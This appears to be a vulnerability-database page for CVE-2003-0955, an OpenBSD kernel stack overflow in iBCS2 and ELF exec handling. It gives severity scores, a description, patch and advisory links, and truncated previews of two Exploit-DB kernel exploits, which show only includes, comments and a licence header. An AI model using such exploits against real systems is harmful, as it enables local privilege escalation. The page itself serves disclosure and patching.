CVE-2003-0955
Published 2003-12-15
Priority: P4 (23) · Severity: medium · CVSS 2.0: 4.6
Vector: AV:L/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.14% (62.7th percentile)
OpenBSD kernel 3.3 and 3.4 allows local users to cause a denial of service (kernel panic) and possibly execute arbitrary code in 3.4 via a program with an invalid header that is not properly handled by (1) ibcs2_exec.c in the iBCS2 emulation (compat_ibcs2) or (2) exec_elf.c, which leads to a stack-based buffer overflow.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| openbsd | openbsd | — | — |
| openbsd | openbsd | — | — |
No detection rules found.
Exploit-DB
OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow
exploitdb·2003-11-19
OpenBSD 2.x
#include
#include
#include
#include
#include
#include
//#include "ibcs2_exec.h"
/* kernel_sc.s shellcode */
/* much improved the opcode search, fixed the stupid logic bug! */
/* do not use! */
/*
silvio gotta get his brain toge
Exploit-DB
OpenBSD - 'ibcs2_exec' Kernel Code Execution
exploitdb·2003-11-07
OpenBSD - 'ibcs2_exec' Kernel Code Execution
---
//
// Patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch
//
#include
#include
#include
#include
/* $OpenBSD: ibcs2_exec.h,v 1.3 2002/03/14 01:26:50 millert Exp $ */
/* $NetBSD: ibcs2_exec.h,v 1.4 1995/03/14 15:12:24 scottb Exp $ */
/*
* Copyright (c) 1994, 1995 Scott Bartram
* All rights reserved.
*
* adapted from sys/sys/exec_ecoff.h
* based on Intel iBCS2
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, t
No writeups or analysis indexed.
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch
http://lists.grok.org.uk/pipermail/full-disclosure/2003-November/013315.html
http://marc.info/?l=openbsd-security-announce&m=106808820119679&w=2
http://marc.info/?l=openbsd-security-announce&m=106917441524978&w=2
http://www.guninski.com/msuxobsd2.html
http://www.openbsd.org/errata33.html
http://www.securityfocus.com/bid/8978